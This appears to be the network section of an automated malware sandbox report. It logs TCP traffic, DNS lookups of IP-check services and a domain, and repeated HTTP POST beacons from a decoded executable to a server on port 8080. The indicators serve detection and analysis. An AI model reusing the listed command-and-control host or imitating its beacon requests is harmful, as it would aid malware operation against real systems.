Dec 16, 2024 12:19:40.230528116 CET	49870	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:40.350559950 CET	8080	49864	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:40.350675106 CET	49864	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:40.351016045 CET	8080	49870	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:40.351133108 CET	49870	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:40.351411104 CET	49870	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:40.351471901 CET	49870	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:40.471458912 CET	8080	49870	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:40.471508026 CET	8080	49870	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:41.613267899 CET	8080	49870	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:41.663506985 CET	49870	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:41.792742968 CET	49870	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:41.793734074 CET	49876	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:41.913069010 CET	8080	49870	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:41.913136959 CET	49870	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:41.913552999 CET	8080	49876	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:41.913674116 CET	49876	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:41.919815063 CET	49876	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:41.919855118 CET	49876	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:42.039767981 CET	8080	49876	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:42.039808035 CET	8080	49876	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:43.175744057 CET	8080	49876	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:43.225969076 CET	49876	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:43.291335106 CET	49876	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:43.310494900 CET	49877	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:43.411717892 CET	8080	49876	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:43.411787033 CET	49876	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:43.430296898 CET	8080	49877	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:43.430394888 CET	49877	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:43.432024002 CET	49877	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:43.432056904 CET	49877	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:43.551830053 CET	8080	49877	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:43.551878929 CET	8080	49877	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:44.708137989 CET	8080	49877	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:44.757158995 CET	49877	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:44.822911978 CET	49877	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:44.822963953 CET	49877	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:44.942898035 CET	8080	49877	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:44.942934036 CET	8080	49877	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:45.367132902 CET	8080	49877	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:45.413466930 CET	49877	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:45.479046106 CET	49877	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:45.479784012 CET	49883	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:45.599253893 CET	8080	49877	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:45.599783897 CET	8080	49883	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:45.600034952 CET	49877	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:45.600083113 CET	49883	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:45.600503922 CET	49883	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:45.600533009 CET	49883	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:45.720380068 CET	8080	49883	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:45.720434904 CET	8080	49883	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:46.893455982 CET	8080	49883	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:46.944690943 CET	49883	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:47.011379957 CET	49883	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:47.012279034 CET	49888	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:47.131429911 CET	8080	49883	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:47.131587029 CET	49883	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:47.132116079 CET	8080	49888	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:47.132215023 CET	49888	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:47.132656097 CET	49888	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:47.132714987 CET	49888	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:47.252593040 CET	8080	49888	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:47.252613068 CET	8080	49888	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:48.420160055 CET	8080	49888	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:48.460426092 CET	49888	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:48.525867939 CET	49888	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:48.526706934 CET	49894	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:48.648452044 CET	8080	49894	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:48.648597956 CET	49894	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:48.648991108 CET	8080	49888	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:48.649163961 CET	49888	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:48.659271002 CET	49894	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:48.659271002 CET	49894	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:48.779392958 CET	8080	49894	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:48.779413939 CET	8080	49894	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:50.067240953 CET	8080	49894	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:50.116556883 CET	49894	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:50.192096949 CET	49894	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:50.192887068 CET	49897	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:50.312571049 CET	8080	49894	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:50.312633991 CET	49894	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:50.312979937 CET	8080	49897	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:50.313047886 CET	49897	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:50.313195944 CET	49897	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:50.313214064 CET	49897	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:50.432872057 CET	8080	49897	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:50.432887077 CET	8080	49897	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:51.581099987 CET	8080	49897	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:51.632349014 CET	49897	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:51.700239897 CET	49897	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:51.703659058 CET	49902	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:51.820489883 CET	8080	49897	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:51.820601940 CET	49897	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:51.823487043 CET	8080	49902	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:51.823596001 CET	49902	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:51.823754072 CET	49902	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:51.823771000 CET	49902	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:51.943572998 CET	8080	49902	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:51.943604946 CET	8080	49902	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:53.123792887 CET	8080	49902	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:53.179076910 CET	49902	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:53.229223013 CET	49902	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:53.230557919 CET	49907	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:53.349558115 CET	8080	49902	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:53.349853039 CET	49902	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:53.350491047 CET	8080	49907	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:53.350720882 CET	49907	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:53.351125002 CET	49907	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:53.351140976 CET	49907	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:53.470904112 CET	8080	49907	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:53.470928907 CET	8080	49907	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:54.639369011 CET	8080	49907	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:54.694700956 CET	49907	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:54.908380032 CET	49907	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:54.909229994 CET	49909	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:55.028671980 CET	8080	49907	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:55.028752089 CET	49907	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:55.028994083 CET	8080	49909	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:55.029076099 CET	49909	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:55.029300928 CET	49909	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:55.029323101 CET	49909	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:55.149347067 CET	8080	49909	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:55.149394989 CET	8080	49909	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:56.317684889 CET	8080	49909	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:56.366580963 CET	49909	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:56.431449890 CET	49909	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:56.432235956 CET	49915	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:56.552223921 CET	8080	49915	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:56.552258968 CET	8080	49909	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:56.552324057 CET	49909	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:56.552414894 CET	49915	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:56.552582979 CET	49915	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:56.552632093 CET	49915	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:56.672825098 CET	8080	49915	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:56.672851086 CET	8080	49915	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:57.823740005 CET	8080	49915	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:57.866552114 CET	49915	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:57.931792021 CET	49915	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:57.932564020 CET	49920	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:58.052236080 CET	8080	49915	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:58.052299023 CET	49915	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:58.052450895 CET	8080	49920	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:58.052531958 CET	49920	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:58.052759886 CET	49920	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:58.052788019 CET	49920	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:58.172780037 CET	8080	49920	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:58.172801018 CET	8080	49920	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:59.307533979 CET	8080	49920	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:59.351118088 CET	49920	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:59.416918993 CET	49920	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:59.417665958 CET	49926	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:59.537141085 CET	8080	49920	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:59.537214041 CET	49920	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:59.537405014 CET	8080	49926	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:59.537502050 CET	49926	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:59.537695885 CET	49926	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:59.537730932 CET	49926	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:59.657370090 CET	8080	49926	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:59.657470942 CET	8080	49926	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:00.806158066 CET	8080	49926	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:00.851027012 CET	49926	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:00.916399956 CET	49926	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:00.917195082 CET	49928	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:01.036854982 CET	8080	49926	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:01.037072897 CET	8080	49928	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:01.037079096 CET	49926	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:01.037211895 CET	49928	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:01.037542105 CET	49928	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:01.037621975 CET	49928	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:01.157485008 CET	8080	49928	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:01.157525063 CET	8080	49928	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:02.316968918 CET	8080	49928	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:02.366625071 CET	49928	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:02.454902887 CET	49928	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:02.455406904 CET	49932	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:02.575226068 CET	8080	49928	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:02.575251102 CET	8080	49932	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:02.575294018 CET	49928	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:02.575366020 CET	49932	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:02.621758938 CET	49932	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:02.621805906 CET	49932	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:02.741646051 CET	8080	49932	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:02.741671085 CET	8080	49932	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:04.030149937 CET	8080	49932	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:04.069894075 CET	49932	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:04.134984016 CET	49932	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:04.135776043 CET	49936	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:04.255956888 CET	8080	49932	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:04.256002903 CET	8080	49936	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:04.256278992 CET	49936	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:04.256405115 CET	49936	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:04.256405115 CET	49936	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:04.256422997 CET	49932	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:04.376408100 CET	8080	49936	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:04.376594067 CET	8080	49936	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:05.513976097 CET	8080	49936	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:05.569725990 CET	49936	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:05.621978998 CET	49936	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:05.622720957 CET	49941	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:05.742489100 CET	8080	49941	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:05.742523909 CET	8080	49936	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:05.742582083 CET	49941	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:05.742708921 CET	49936	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:05.742789030 CET	49941	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:05.742789030 CET	49941	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:05.862818956 CET	8080	49941	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:05.862910032 CET	8080	49941	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:06.998188972 CET	8080	49941	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:07.038496971 CET	49941	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:07.104238033 CET	49941	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:07.105081081 CET	49945	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:07.224658966 CET	8080	49941	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:07.224852085 CET	8080	49945	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:07.224909067 CET	49941	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:07.225100994 CET	49945	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:07.225100994 CET	49945	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:07.225137949 CET	49945	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:07.345304012 CET	8080	49945	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:07.345330000 CET	8080	49945	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:08.529226065 CET	8080	49945	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:08.569837093 CET	49945	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:08.637360096 CET	49945	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:08.638362885 CET	49949	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:08.757949114 CET	8080	49945	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:08.758038044 CET	49945	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:08.758452892 CET	8080	49949	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:08.758568048 CET	49949	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:08.758769989 CET	49949	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:08.758804083 CET	49949	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:08.879029989 CET	8080	49949	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:08.879082918 CET	8080	49949	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:10.064316988 CET	8080	49949	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:10.116878986 CET	49949	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:10.181963921 CET	49949	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:10.182553053 CET	49955	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:10.302445889 CET	8080	49949	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:10.302464008 CET	8080	49955	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:10.302557945 CET	49955	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:10.302632093 CET	49949	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:10.302959919 CET	49955	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:10.303052902 CET	49955	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:10.422738075 CET	8080	49955	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:10.422768116 CET	8080	49955	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:11.619467020 CET	8080	49955	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:11.663609982 CET	49955	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:11.728470087 CET	49955	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:11.729221106 CET	49958	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:11.848856926 CET	8080	49955	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:11.849087000 CET	49955	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:11.850011110 CET	8080	49958	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:11.850202084 CET	49958	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:11.850428104 CET	49958	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:11.850461960 CET	49958	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:20:11.970453024 CET	8080	49958	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:11.970474005 CET	8080	49958	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:13.461311102 CET	8080	49958	31.13.224.69	192.168.2.4
Dec 16, 2024 12:20:13.507235050 CET	49958	8080	192.168.2.4	31.13.224.69

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 16, 2024 12:18:19.943370104 CET	63512	53	192.168.2.4	1.1.1.1
Dec 16, 2024 12:18:20.081660032 CET	53	63512	1.1.1.1	192.168.2.4
Dec 16, 2024 12:18:22.142328024 CET	61125	53	192.168.2.4	1.1.1.1
Dec 16, 2024 12:18:22.280951977 CET	53	61125	1.1.1.1	192.168.2.4
Dec 16, 2024 12:18:29.230524063 CET	62274	53	192.168.2.4	1.1.1.1
Dec 16, 2024 12:18:29.743118048 CET	53	62274	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 16, 2024 12:18:19.943370104 CET	192.168.2.4	1.1.1.1	0x9f1e	Standard query (0)	checkip.amazonaws.com	A (IP address)	IN (0x0001)	false
Dec 16, 2024 12:18:22.142328024 CET	192.168.2.4	1.1.1.1	0x4fb8	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
Dec 16, 2024 12:18:29.230524063 CET	192.168.2.4	1.1.1.1	0x78e6	Standard query (0)	xscapezo.capetown	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 16, 2024 12:18:20.081660032 CET	1.1.1.1	192.168.2.4	0x9f1e	No error (0)	checkip.amazonaws.com	checkip.check-ip.aws.a2z.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 12:18:20.081660032 CET	1.1.1.1	192.168.2.4	0x9f1e	No error (0)	checkip.check-ip.aws.a2z.com	checkip.eu-west-1.prod.check-ip.aws.a2z.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 12:18:20.081660032 CET	1.1.1.1	192.168.2.4	0x9f1e	No error (0)	checkip.eu-west-1.prod.check-ip.aws.a2z.com		52.17.181.189	A (IP address)	IN (0x0001)	false
Dec 16, 2024 12:18:20.081660032 CET	1.1.1.1	192.168.2.4	0x9f1e	No error (0)	checkip.eu-west-1.prod.check-ip.aws.a2z.com		54.195.26.29	A (IP address)	IN (0x0001)	false
Dec 16, 2024 12:18:20.081660032 CET	1.1.1.1	192.168.2.4	0x9f1e	No error (0)	checkip.eu-west-1.prod.check-ip.aws.a2z.com		18.202.169.9	A (IP address)	IN (0x0001)	false
Dec 16, 2024 12:18:22.280951977 CET	1.1.1.1	192.168.2.4	0x4fb8	No error (0)	ipinfo.io		34.117.59.81	A (IP address)	IN (0x0001)	false
Dec 16, 2024 12:18:29.743118048 CET	1.1.1.1	192.168.2.4	0x78e6	No error (0)	xscapezo.capetown		31.13.224.69	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

checkip.amazonaws.com

ipinfo.io

xscapezo.capetown:8080

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:18:29.864702940 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:18:31.126600027 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:18:30 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49739	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:18:31.365756989 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:18:32.644475937 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:18:32 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:18:32.882257938 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:18:34.149986982 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:18:33 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49741	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:18:34.383893967 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
